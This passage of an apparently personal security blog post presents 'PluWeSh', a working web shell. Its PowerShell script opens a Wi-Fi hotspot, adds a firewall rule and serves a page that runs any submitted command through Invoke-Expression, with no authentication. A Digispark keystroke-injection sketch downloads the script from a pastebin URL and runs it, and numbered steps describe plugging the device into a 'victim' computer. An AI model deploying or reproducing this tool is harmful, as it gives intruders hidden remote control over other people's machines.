<span class="hljs-comment">    Auto -&gt; 0	</span>
<span class="hljs-comment">        Specifies that the WiFi adapter is free to choose any band per internal logic.</span>
<span class="hljs-comment"></span>
<span class="hljs-comment">    FiveGigahertz -&gt; 2	</span>
<span class="hljs-comment">        Specifies that the WiFi adapter uses only the 5 GHz band.</span>
<span class="hljs-comment"></span>
<span class="hljs-comment">    TwoPointFourGigahertz -&gt; 1	</span>
<span class="hljs-comment">        Specifies that the WiFi adapter uses only the 2.4 GHz band.</span>
<span class="hljs-comment">#&gt;</span>

<span class="hljs-variable">$configuration</span>.Band = <span class="hljs-number">0</span>

<span class="hljs-comment"># ==============================================================================================</span>


<span class="hljs-comment"># ======================================== Access Point: =======================================</span>

<span class="hljs-keyword">try</span> &#123;


    <span class="hljs-built_in">Add-Type</span> <span class="hljs-literal">-AssemblyName</span> System.Runtime.WindowsRuntime
    <span class="hljs-variable">$asTaskGeneric</span> = ([<span class="hljs-type">System.WindowsRuntimeSystemExtensions</span>].GetMethods() | ? &#123; <span class="hljs-variable">$_</span>.Name <span class="hljs-operator">-eq</span> <span class="hljs-string">&#x27;AsTask&#x27;</span> <span class="hljs-operator">-and</span> <span class="hljs-variable">$_</span>.GetParameters().Count <span class="hljs-operator">-eq</span> <span class="hljs-number">1</span> <span class="hljs-operator">-and</span> <span class="hljs-variable">$_</span>.GetParameters()[<span class="hljs-number">0</span>].ParameterType.Name <span class="hljs-operator">-eq</span> <span class="hljs-string">&#x27;IAsyncOperation`1&#x27;</span> &#125;)[<span class="hljs-number">0</span>]
    <span class="hljs-function"><span class="hljs-keyword">Function</span> <span class="hljs-title">Await</span><span class="hljs-params">(<span class="hljs-variable">$WinRtTask</span>, <span class="hljs-variable">$ResultType</span>)</span></span> &#123;
        <span class="hljs-variable">$asTask</span> = <span class="hljs-variable">$asTaskGeneric</span>.MakeGenericMethod(<span class="hljs-variable">$ResultType</span>)
        <span class="hljs-variable">$netTask</span> = <span class="hljs-variable">$asTask</span>.Invoke(<span class="hljs-variable">$null</span>, <span class="hljs-selector-tag">@</span>(<span class="hljs-variable">$WinRtTask</span>))
        <span class="hljs-variable">$netTask</span>.Wait(<span class="hljs-literal">-1</span>) | <span class="hljs-built_in">Out-Null</span>
    &#125;

    <span class="hljs-function"><span class="hljs-keyword">Function</span> <span class="hljs-title">AwaitAction</span><span class="hljs-params">(<span class="hljs-variable">$WinRtAction</span>)</span></span> &#123;
        <span class="hljs-variable">$asTask</span> = ([<span class="hljs-type">System.WindowsRuntimeSystemExtensions</span>].GetMethods() | ? &#123; <span class="hljs-variable">$_</span>.Name <span class="hljs-operator">-eq</span> <span class="hljs-string">&#x27;AsTask&#x27;</span> <span class="hljs-operator">-and</span> <span class="hljs-variable">$_</span>.GetParameters().Count <span class="hljs-operator">-eq</span> <span class="hljs-number">1</span> <span class="hljs-operator">-and</span> !<span class="hljs-variable">$_</span>.IsGenericMethod &#125;)[<span class="hljs-number">0</span>]
        <span class="hljs-variable">$netTask</span> = <span class="hljs-variable">$asTask</span>.Invoke(<span class="hljs-variable">$null</span>, <span class="hljs-selector-tag">@</span>(<span class="hljs-variable">$WinRtAction</span>))
        <span class="hljs-variable">$netTask</span>.Wait(<span class="hljs-literal">-1</span>) | <span class="hljs-built_in">Out-Null</span>
    &#125;


    <span class="hljs-variable">$connectionProfile</span> = [<span class="hljs-type">Windows.Networking.Connectivity.NetworkInformation</span>,<span class="hljs-type">Windows.Networking.Connectivity</span>,<span class="hljs-type">ContentType</span>=<span class="hljs-type">WindowsRuntime</span>]::GetInternetConnectionProfile()
    <span class="hljs-variable">$tetheringManager</span> = [<span class="hljs-type">Windows.Networking.NetworkOperators.NetworkOperatorTetheringManager</span>,<span class="hljs-type">Windows.Networking.NetworkOperators</span>,<span class="hljs-type">ContentType</span>=<span class="hljs-type">WindowsRuntime</span>]::CreateFromConnectionProfile(<span class="hljs-variable">$connectionProfile</span>)



    <span class="hljs-comment"># Use above configuration for the new AP</span>
    AwaitAction (<span class="hljs-variable">$tetheringManager</span>.ConfigureAccessPointAsync(<span class="hljs-variable">$configuration</span>))


    <span class="hljs-comment"># Start AP</span>
    Await (<span class="hljs-variable">$tetheringManager</span>.StartTetheringAsync()) ([<span class="hljs-type">Windows.Networking.NetworkOperators.NetworkOperatorTetheringOperationResult</span>])

&#125; <span class="hljs-keyword">catch</span> &#123;
<span class="hljs-comment"># Errors...</span>
<span class="hljs-comment"># Silence.</span>
&#125;

<span class="hljs-comment"># ==============================================================================================</span>

<span class="hljs-comment"># Add Firewall rule (this needs admin rights)</span>
<span class="hljs-comment"># This is needed to access the web server from another device in the LAN</span>
netsh advfirewall firewall add rule name=<span class="hljs-string">&quot;<span class="hljs-variable">$</span>(<span class="hljs-variable">$port</span>) ps Server&quot;</span> <span class="hljs-built_in">dir</span>=<span class="hljs-keyword">in</span> action=allow protocol=TCP localport=<span class="hljs-variable">$</span>(<span class="hljs-variable">$port</span>)


<span class="hljs-comment"># ============================================= Website: =======================================</span>
 
<span class="hljs-variable">$template</span> = <span class="hljs-string">@&#x27;</span>
<span class="hljs-string">&lt;!DOCTYPE HTML&gt;</span>
<span class="hljs-string">&lt;html&gt;</span>
<span class="hljs-string">    &lt;head&gt;</span>
<span class="hljs-string">        &lt;title&gt;PluWeSh&lt;/title&gt;</span>
<span class="hljs-string">        &lt;meta charset=&quot;UTF-8&quot;&gt;</span>
<span class="hljs-string">        &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;</span>
<span class="hljs-string">        &lt;style type=&quot;text/css&quot;&gt;</span>
<span class="hljs-string">            html, body, #container &#123;height:95%&#125;</span>
<span class="hljs-string">            body &#123;font-family:verdana;line-height:1.5;background-color:#1c1c1c&#125;</span>
<span class="hljs-string">            form, #container, p &#123;align-items:center;display:flex;flex-direction:column;justify-content:center; color:#7d397d;&#125;</span>
<span class="hljs-string">            input, textarea &#123;border:1px solid #306468;border-radius:4px;margin-bottom:10px;padding:4px;background-color: #232029; color:#56829b&#125;</span>
<span class="hljs-string">            input[type=submit] &#123;padding:6px 10px&#125;</span>
<span class="hljs-string">            label, p &#123;font-size:10px;padding-bottom:2px;text-transform:uppercase&#125;</span>
<span class="hljs-string">            h1 &#123;margin-bottom:0px;color: #217f85;&#125;</span>
<span class="hljs-string">        &lt;/style&gt;</span>
<span class="hljs-string">    &lt;/head&gt;</span>
<span class="hljs-string">    &lt;body&gt;</span>
<span class="hljs-string">        &lt;div id=&quot;container&quot;&gt;</span>
<span class="hljs-string">        &lt;h1&gt;PluWeSh&lt;/h1&gt;</span>
<span class="hljs-string">        &lt;h5&gt;The Pluggable WebShell&lt;/h5&gt;</span>
<span class="hljs-string">            &lt;div id=&quot;content&quot;&gt;</span>
<span class="hljs-string">                &#123;page&#125;</span>
<span class="hljs-string">            &lt;/div&gt;</span>
<span class="hljs-string">        &lt;/div&gt;</span>
<span class="hljs-string">    &lt;/body&gt;</span>
<span class="hljs-string">&lt;/html&gt;</span>
<span class="hljs-string">&#x27;@</span>

<span class="hljs-comment"># Command submitting form</span>
<span class="hljs-variable">$form</span> = <span class="hljs-string">@&#x27;</span>
<span class="hljs-string">&lt;form method=&quot;post&quot;&gt;</span>
<span class="hljs-string">    &lt;label for=&quot;cmnd&quot;&gt;Command (Powershell only)&lt;/label&gt;</span>
<span class="hljs-string">    &lt;input type=&quot;textarea&quot; name=&quot;cmnd&quot; value=&quot;&quot; placeholder=&quot;start cmd&quot; required /&gt;</span>
<span class="hljs-string">    &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;Submit&quot; /&gt;</span>
<span class="hljs-string">&lt;/form&gt;</span>
<span class="hljs-string"></span>
<span class="hljs-string">&lt;textarea readonly placeholder=&quot;Output...&quot; rows=&quot;8&quot; cols=&quot;40&quot;&gt;</span>
<span class="hljs-string">&#123;rslt&#125;  </span>
<span class="hljs-string">&lt;/textarea&gt;</span>
<span class="hljs-string">&#x27;@</span>


<span class="hljs-comment"># request actions.</span>
<span class="hljs-variable">$routes</span> = <span class="hljs-selector-tag">@</span>&#123;
  <span class="hljs-string">&#x27;GET /&#x27;</span>  = &#123; <span class="hljs-keyword">return</span> (render <span class="hljs-variable">$template</span> <span class="hljs-variable">$form</span>) &#125;
  <span class="hljs-string">&#x27;POST /&#x27;</span> = &#123;
    <span class="hljs-comment"># get post data.</span>
    <span class="hljs-variable">$data</span> = extract <span class="hljs-variable">$request</span>

    <span class="hljs-comment"># get the submitted name.</span>
    <span class="hljs-variable">$cmnd</span> = [<span class="hljs-type">System.Web.HttpUtility</span>]::UrlDecode(<span class="hljs-variable">$data</span>.item(<span class="hljs-string">&#x27;cmnd&#x27;</span>))

    <span class="hljs-comment"># Command execution</span>
    <span class="hljs-variable">$rslt</span> = <span class="hljs-built_in">Invoke-Expression</span> <span class="hljs-variable">$cmnd</span>
    
    <span class="hljs-comment"># render the &#x27;form&#x27; snippet, passing the result.</span>
    <span class="hljs-variable">$page</span> = render <span class="hljs-variable">$form</span> <span class="hljs-selector-tag">@</span>&#123;rslt = <span class="hljs-variable">$rslt</span>&#125;


    <span class="hljs-comment"># embed the snippet into the template.</span>
    <span class="hljs-keyword">return</span> (render <span class="hljs-variable">$template</span> <span class="hljs-variable">$page</span>)
  &#125;
&#125;

<span class="hljs-comment"># embed content into the default template.</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span><span class="hljs-params">(<span class="hljs-variable">$template</span>, <span class="hljs-variable">$content</span>)</span></span> &#123;
  <span class="hljs-comment"># shorthand for rendering the template.</span>
  <span class="hljs-keyword">if</span> (<span class="hljs-variable">$content</span> <span class="hljs-operator">-is</span> [<span class="hljs-built_in">string</span>]) &#123; <span class="hljs-variable">$content</span> = <span class="hljs-selector-tag">@</span>&#123;page = <span class="hljs-variable">$content</span>&#125; &#125;
  <span class="hljs-keyword">if</span> (<span class="hljs-variable">$rslt</span> <span class="hljs-operator">-is</span> [<span class="hljs-built_in">string</span>]) &#123; <span class="hljs-variable">$rslt</span> = <span class="hljs-selector-tag">@</span>&#123;rslt = <span class="hljs-variable">$rslt</span>&#125; &#125;

  <span class="hljs-comment">#check for &#123;xxx&#125;&#x27;s to replace them with the corresponding data</span>
  <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$key</span> <span class="hljs-keyword">in</span> <span class="hljs-variable">$content</span>.keys) &#123;
    <span class="hljs-variable">$template</span> = <span class="hljs-variable">$template</span> <span class="hljs-operator">-replace</span> <span class="hljs-string">&quot;&#123;<span class="hljs-variable">$key</span>&#125;&quot;</span>, <span class="hljs-variable">$content</span>[<span class="hljs-variable">$key</span>]
  &#125;

  <span class="hljs-keyword">return</span> <span class="hljs-variable">$template</span>
&#125;

<span class="hljs-comment"># get post data from the input stream.</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">extract</span><span class="hljs-params">(<span class="hljs-variable">$request</span>)</span></span> &#123;
  <span class="hljs-variable">$length</span> = <span class="hljs-variable">$request</span>.contentlength64
  <span class="hljs-variable">$buffer</span> = <span class="hljs-built_in">new-object</span> <span class="hljs-string">&quot;byte[]&quot;</span> <span class="hljs-variable">$length</span>

  [<span class="hljs-built_in">void</span>]<span class="hljs-variable">$request</span>.inputstream.read(<span class="hljs-variable">$buffer</span>, <span class="hljs-number">0</span>, <span class="hljs-variable">$length</span>)
  <span class="hljs-variable">$body</span> = [<span class="hljs-type">system.text.encoding</span>]::ascii.getstring(<span class="hljs-variable">$buffer</span>)

  <span class="hljs-variable">$data</span> = <span class="hljs-selector-tag">@</span>&#123;&#125;
  <span class="hljs-variable">$body</span>.split(<span class="hljs-string">&#x27;&amp;&#x27;</span>) | %&#123;
    <span class="hljs-variable">$part</span> = <span class="hljs-variable">$_</span>.split(<span class="hljs-string">&#x27;=&#x27;</span>)
    <span class="hljs-variable">$data</span>.add(<span class="hljs-variable">$part</span>[<span class="hljs-number">0</span>], <span class="hljs-variable">$part</span>[<span class="hljs-number">1</span>])

  &#125;

  <span class="hljs-keyword">return</span> <span class="hljs-variable">$data</span>

&#125;

<span class="hljs-comment">#Create listener</span>
<span class="hljs-variable">$listener</span> = <span class="hljs-built_in">new-object</span> system.net.httplistener
<span class="hljs-variable">$listener</span>.prefixes.add(<span class="hljs-variable">$url</span>)
<span class="hljs-variable">$listener</span>.start()



<span class="hljs-keyword">while</span> (<span class="hljs-variable">$listener</span>.islistening) &#123;
  <span class="hljs-variable">$context</span> = <span class="hljs-variable">$listener</span>.getcontext()
  <span class="hljs-variable">$request</span> = <span class="hljs-variable">$context</span>.request
  <span class="hljs-variable">$response</span> = <span class="hljs-variable">$context</span>.response

  <span class="hljs-variable">$pattern</span> = <span class="hljs-string">&quot;&#123;0&#125; &#123;1&#125;&quot;</span> <span class="hljs-operator">-f</span> <span class="hljs-variable">$request</span>.httpmethod, <span class="hljs-variable">$request</span>.url.localpath
  <span class="hljs-variable">$route</span> = <span class="hljs-variable">$routes</span>.get_item(<span class="hljs-variable">$pattern</span>)

  <span class="hljs-keyword">if</span> (<span class="hljs-variable">$route</span> <span class="hljs-operator">-eq</span> <span class="hljs-variable">$null</span>) &#123;
    <span class="hljs-variable">$response</span>.statuscode = <span class="hljs-number">404</span>
  &#125; <span class="hljs-keyword">else</span> &#123;
    <span class="hljs-variable">$content</span> = &amp; <span class="hljs-variable">$route</span>
    <span class="hljs-variable">$buffer</span> = [<span class="hljs-type">system.text.encoding</span>]::utf8.getbytes(<span class="hljs-variable">$content</span>)
    <span class="hljs-variable">$response</span>.contentlength64 = <span class="hljs-variable">$buffer</span>.length
    <span class="hljs-variable">$response</span>.outputstream.write(<span class="hljs-variable">$buffer</span>, <span class="hljs-number">0</span>, <span class="hljs-variable">$buffer</span>.length)
  &#125;

  <span class="hljs-variable">$response</span>.close()
&#125;
<span class="hljs-comment"># ==============================================================================================</span></code></pre></div>



<h2 id="Using-Digispark"><a href="#Using-Digispark" class="headerlink" title="Using Digispark"></a>Using Digispark</h2><p>As I said at the beginning, PluWeSh was initially designed to work with a digispark.<br>I’m not gonna make a tutorial to show you how to program it here, but there you can see my program to download the script and execute it as administrator. </p>
<p>Anyway, this is working very well :</p>
<div class="hljs"><pre><code class="hljs C"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&quot;DigiKeyboardFr.h&quot;</span></span>

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">setup</span><span class="hljs-params">()</span> </span>&#123;

  <span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> KEY_ARROW_LEFT      80</span>
  

  DigiKeyboard.sendKeyStroke(<span class="hljs-number">0</span>);

  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(<span class="hljs-number">600</span>);
  DigiKeyboardFr.println(<span class="hljs-string">&quot;powershell&quot;</span>); 
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(<span class="hljs-number">600</span>);
  DigiKeyboardFr.println(<span class="hljs-string">&quot;$ds = [Environment]::GetFolderPath(\&quot;UserProfile\&quot;); cd $ds; wget https://pastebin.com/raw/file -OutFile config.ps1;&quot;</span>);
  DigiKeyboardFr.println(<span class="hljs-string">&quot;./config.ps1; exit&quot;</span>);

  DigiKeyboard.delay(<span class="hljs-number">1900</span>);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  &#125;
</code></pre></div>

<p><strong>Be careful, I used the <code>DigiKeyboardFr</code> library, but if you don’t have a french keyboard use the usual library.</strong></p>
<h2 id="Use-it"><a href="#Use-it" class="headerlink" title="Use it"></a>Use it</h2><p><img src="/img/articles/PluWeSh/PhoneShell.jpeg" srcset="/img/loading.gif" alt="WebShell on Phone"></p>
<p>Once the script configured for your needs, uploaded to the internet, and the Digispark programmed, you should be ready.</p>
<p><strong>1.</strong> Plug the digispark into the computer which <strong>simulates</strong> the victim.<br><strong>2.</strong> Wait a few seconds.<br><strong>3.</strong> Open your phone, laptop, … and connect to the new access point.<br><strong>4.</strong> Scan for the victims IP address inside the local network<br><strong>5.</strong> Enterthe Ip address, followed by the port into the URL bar of your browser (e.g. <strong>192.168.43.214:1338</strong>)</p>
<p>A wild webshell appears.</p>
<h2 id="Contact"><a href="#Contact" class="headerlink" title="Contact"></a>Contact</h2><p>If you need some help, the easiest and fasted way to contact me in joining my <strong><a target="_blank" rel="noopener" href="https://discord.gg/pNztbYM">Discord server</a></strong>.</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/powershell/">powershell</a>
                    
                      <a class="hover-with-bg" href="/tags/script/">script</a>
                    
                      <a class="hover-with-bg" href="/tags/digispark/">digispark</a>
                    
                      <a class="hover-with-bg" href="/tags/hardware/">hardware</a>
                    
                      <a class="hover-with-bg" href="/tags/project/">project</a>
                    
                  </div>
                
              </div>
              

		<br>
		Share :  <a href="https://www.facebook.com/sharer/sharer.php?u=http://w01f.xyz/2020/11/07/PluWeSh/&t=PluWeSh" target="_blank" rel="noopener"> <i class="fa fa-facebook-square fa-2x"></i> | </a>   <a href="https://twitter.com/intent/tweet?text=%22PluWeSh%22%20http://w01f.xyz/2020/11/07/PluWeSh/%20via%20@hexojs" target="_blank" rel="noopener"> <i class="fa fa-twitter-square fa-2x"></i> | </a>   <a href="https://www.linkedin.com/sharing/share-offsite/?url=http://w01f.xyz/2020/11/07/PluWeSh/&title=PluWeSh" target="_blank" rel="noopener"> <i class="fa fa-linkedin fa-2x"></i> </a>
		<br>


              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/11/11/Challenge-Brigitte-Friang-Entry/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Challenge Brigitte Friang - Entry</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/10/01/Cicada-3301-Vol-1-TryHackMe-Writeup/">
                        <span class="hidden-mobile">Cicada-3301 Vol.1 TryHackMe Writeup</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>
		

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <div id="vcomments"></div>
  <script type="text/javascript">
    function loadValine() {
      addScript('https://cdn.staticfile.org/valine/1.4.14/Valine.min.js', function () {
        new Valine({
          el: "#vcomments",
          app_id: "b70Y4vW45puW9piv90cgQhGG-MdYXbMMI",
          app_key: "ccKemUSih2JTtCuBvaEm1jNy",
          placeholder: "Write someting...",
          path: window.location.pathname,
          avatar: "retro",
          meta: ["nick","mail","link"],
          pageSize: "10",
          lang: "en",
          highlight: false,
          recordIP: false,
          serverURLs: "",
        });
      });
    }
    waitElementVisible('vcomments', loadValine);
  </script>
  <noscript>Please enable JavaScript to view the <a target="_blank" href="https://valine.js.org" rel="nofollow noopener noopener">comments
      powered by Valine.</a></noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="/" target="_blank" rel="nofollow noopener"><span>w01f</span></a>
      <i class="iconfont icon-love"></i>
      2020
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "PluWeSh&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 80,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>

















  

  
    <!-- Google Analytics -->
    <script defer>
      window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) };
      ga.l = +new Date;
      ga('create', 'UA-101896722-2', 'auto');
      ga('send', 'pageview');
    </script>
    <script async src='https://www.google-analytics.com/analytics.js'></script>
  

  
    <!-- Google gtag.js -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=GTM-MM7R4WW"></script>
    <script defer>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'GTM-MM7R4WW');
    </script>
  

  

  

  





</body>
</html>
